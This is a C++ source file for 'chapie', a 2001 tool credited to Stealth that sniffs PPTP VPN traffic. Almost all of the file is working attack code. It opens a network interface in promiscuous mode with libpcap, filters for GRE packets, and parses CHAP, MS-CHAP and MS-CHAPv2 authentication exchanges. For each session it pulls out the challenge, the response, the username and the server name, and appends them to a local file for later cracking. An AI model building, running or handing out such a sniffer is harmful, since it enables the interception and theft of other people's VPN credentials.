/*
 * Copyright (C) 2001 Stealth.
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 *    must display the following acknowledgement:
 *      This product includes software developed by Stealth.
 * 4. The name Stealth may not be used to endorse or promote
 *    products derived from this software without specific prior written
 *    permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
 * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <errno.h>
#include <string.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <netdb.h>
#include <map>
#include <string>
#include <sys/types.h>
#include <signal.h>
#include <arpa/inet.h>


extern "C" {
#include <pcap.h>
#include "misc.h"
#include "chap.h"
}

using namespace std;

// Sourceaddress-based map
map<u_int32_t, chap_session> sessions;

void die(const char *s)
{
	perror(s);
	exit(errno);
}

void help()
{
	printf("chapie -- PPTP challenge/resposne sniffer.\n"
	       "(C) 2001 by Stealth <stealth@team-teso.net>\n\n"
	       "'chapie <device>' -- dumps challenge/reponses to ./futter file.\n"
		"might be forced by pressing 'Ctrl-C'\n\n");
	exit(1);
}

void dump_session(const chap_session &s)
{
	FILE *f = fopen("./futter", "a+");

	if (!f)
		die("fopen");

	if (fwrite(&s, sizeof(s), 1, f) != 1)
		die("fwrite");

	fclose(f);

	struct in_addr in1 = {s.saddr},
		       in2 = {s.daddr};

	string src = inet_ntoa(in1);
	string dst = inet_ntoa(in2);

	printf("%s->%s ", src.c_str(), dst.c_str());
	
	switch (s.chal_type) {
	case CHAP_DIGEST_MD5:
		printf("CHAP_DIGEST_MD5 ");
		break;
	case CHAP_MICROSOFT:
		printf("CHAP_MICROSOFT ");
		break;
	case CHAP_MICROSOFT_V2:
		printf("CHAP_MICROSOFT_V2 ");
		break;
	}

	printf("user: %s server: %s\n", s.login, s.server_name);
}

//force dumping
void sig_x(int)
{
	map<u_int32_t,chap_session>::iterator
	i = sessions.begin();

	for (; i != sessions.end(); ++i)
		dump_session(i->second);
	return;
}


void fire_out()
{
	map<u_int32_t,chap_session>::iterator
		i = sessions.begin();

	for (; i != sessions.end(); ++i) {
		if (i->second.state == CHAP_SUCCESS) {
			dump_session(i->second);
			sessions.erase(i);
			break;
		}
	}
}

bool is_authrequest(const u_char *buf, size_t buflen, unsigned char *chal_type)
{
	const u_char *ptr = buf;
	
	unsigned int x, o = 0;
	
	if (buflen < 8)
		return 0;

	// Nice loop, eh? :-)
	for (;o++ < buflen - 8; ++ptr) {
		if (PPP_PROTOCOL(ptr) == PPP_LCP) {
			ptr += 2;
			o += 2;
			GETCHAR(x, ptr);
			if (1 != x)	// config request?
				continue;
			for (;o++ < buflen; ++ptr) {
				if (PPP_PROTOCOL(ptr) == PPP_CHAP) {
					ptr += 2;
					o += 2;
					GETCHAR(*chal_type, ptr);
					if (*chal_type == CHAP_DIGEST_MD5 ||
				    	    *chal_type == CHAP_MICROSOFT  ||
				            *chal_type == CHAP_MICROSOFT_V2)
						return 1;
				}
			}
		}
	}
	return 0;
}

// return 1 if packet is of type 'CHAP CHALLENGE'
bool is_challenge(const u_char *buf, size_t buflen, unsigned char *id, size_t *off)
{
	const u_char *ptr = buf;
	unsigned int code, len, o = 0;

	assert(id);
	assert(off);

	if (buflen < 10)
		return 0;
	for (;o++ < buflen - 10; ++ptr) {
		if (PPP_PROTOCOL(ptr) == PPP_CHAP) {
			ptr += 2;
			GETCHAR(code, ptr);
			GETCHAR(*id, ptr);
			GETSHORT(len, ptr);
			if (code == CHAP_CHALLENGE && !(len < CHAP_HEADERLEN || len > buflen)) {
				*off = ptr-buf; 
				return 1;
			} else
				return 0;
		}
	}
	return 0; 
}

// return 1 if packet is of type 'CHAP RESPONSE'
bool is_response(const u_char *buf, size_t buflen, unsigned char *id, size_t *off)
{
	const u_char *ptr = buf;
	unsigned int code, len, o = 0;

	assert(id);
	assert(off);

	if (buflen < 10)
		return 0;

	for (;o++ < buflen - 10; ++ptr) {
		if (PPP_PROTOCOL(ptr) == PPP_CHAP) {
			ptr += 2;
			GETCHAR(code, ptr);
			GETCHAR(*id, ptr);
			GETSHORT(len, ptr);
			if (code == CHAP_RESPONSE && !(len < CHAP_HEADERLEN || len > buflen)) {
				*off = ptr-buf;
				return 1;
			} else
				return 0;
		}
	}
	return 0; 

}

bool is_success(const u_char *buf, size_t buflen)
{
	const u_char *ptr = buf;
	unsigned int code, o = 0;

	if (buflen < 8)
		return 0;
	for (;o++ < buflen - 8; ++ptr) {
		if (PPP_PROTOCOL(ptr) == PPP_CHAP) {
			ptr += 2;
			GETCHAR(code, ptr);
			return (code == CHAP_SUCCESS);
		}
	}
	return 0;
}

void mangle(u_char *user, const pcap_pkthdr *ph, const u_char *packet)
{
	// find starting point of IP-header
	int offset = findOffset((char*)packet, ph->len, 1);

	if (offset < 0)
		return;

	iphdr *iph = (iphdr*)(packet + offset);

	size_t plen = ph->caplen - offset - (iph->ihl<<2);
	const u_char *buf = packet + offset + (iph->ihl<<2);

	chap_session s;
	unsigned char id;

	memset(&s, 0, sizeof(s));

	size_t off;
	do {
	
	if (sessions.find(iph->daddr) == sessions.end() &&
	    is_authrequest(buf, plen, &s.chal_type)) {
		s.saddr = iph->daddr;
		s.daddr = iph->saddr;
		s.state = CHAP_HOWTO;
		sessions[s.saddr] = s;	// Key for map: Client-IP 
					// (== daddr from packet server sent)
		printf("Auth request\n");
	} else if (is_challenge(buf, plen, &id, &off)) {
		buf += off;
		if (*buf > MAX_CHALLENGE_LENGTH)
			break;
		printf("Challenge\n");
		if (sessions.find(iph->daddr) == sessions.end())
			break;
		sessions[iph->daddr].state = CHAP_CHALLENGE;
		sessions[iph->daddr].id = id;
		sessions[iph->daddr].chal_len = *buf;
		memcpy(sessions[iph->daddr].challenge, &buf[1], *buf);

		plen -= off;
		plen -= *buf;
		--plen;
		if (plen < 0 || plen > sizeof(s.server_name) - 1)
			break;
		buf += *buf+1;
		memcpy(sessions[iph->daddr].server_name, buf, plen);
	} else if (is_response(buf, plen, &id, &off)) {
		buf += off;
		printf("Response\n");
		if (*buf > MAX_RESPONSE_LENGTH) // *buf holds length of response
			break;
		if (sessions.find(iph->saddr) == sessions.end())
			break;
		sessions[iph->saddr].state = CHAP_RESPONSE;
		sessions[iph->saddr].resp_len = *buf;
		memcpy(sessions[iph->saddr].response, &buf[1], *buf);

		plen -= off;
		plen -= *buf;
		--plen;
		if (plen < 0 || plen > sizeof(s.login)-1)
			break;
		buf += *buf+1;
		memcpy(sessions[iph->saddr].login, buf, plen);
		sessions[iph->saddr].state = CHAP_RESPONSE;
	} else if (is_success(buf, plen)) {
		if (sessions.find(iph->daddr) == sessions.end())
			break;
		sessions[iph->daddr].state = CHAP_SUCCESS;
		printf("Success!\n");
	}

	} while (0);

	fire_out();
}

int main(int argc, char **argv)
{
	char *filter = "ip proto 47", *captureDevice;
	pcap_t *ph;
	struct bpf_program f;
	char ebuf[PCAP_ERRBUF_SIZE];
	u_int32_t localnet, netmask;

	if (argc < 2)
		help();

	captureDevice = strdup(argv[1]);

	/* Set up Pcap code
  	 */
	if ((ph = pcap_open_live(captureDevice, 1024, 1, 500, ebuf)) == NULL)
           	die(ebuf);

	if (pcap_lookupnet(captureDevice, &localnet, &netmask, ebuf) < 0) {
           	snprintf(ebuf, sizeof(ebuf), "pcap_lookupnet: %s\n",
			pcap_geterr(ph));
		die(ebuf);
        }
        
	if (pcap_compile(ph, &f, filter, 1, netmask) < 0) {
           	snprintf(ebuf, sizeof(ebuf), "pcap_compile: %s\n",
			pcap_geterr(ph));
		die(ebuf);
        }
	if (pcap_setfilter(ph, &f) < 0) {
           	snprintf(ebuf, sizeof(ebuf), "pcap_setfilter: %s\n",
			pcap_geterr(ph));
		die(ebuf);
        }

	signal(SIGINT, sig_x);
	setbuffer(stdout, NULL, 0);
	pcap_loop(ph, -1, mangle, NULL);

	return 0;
}

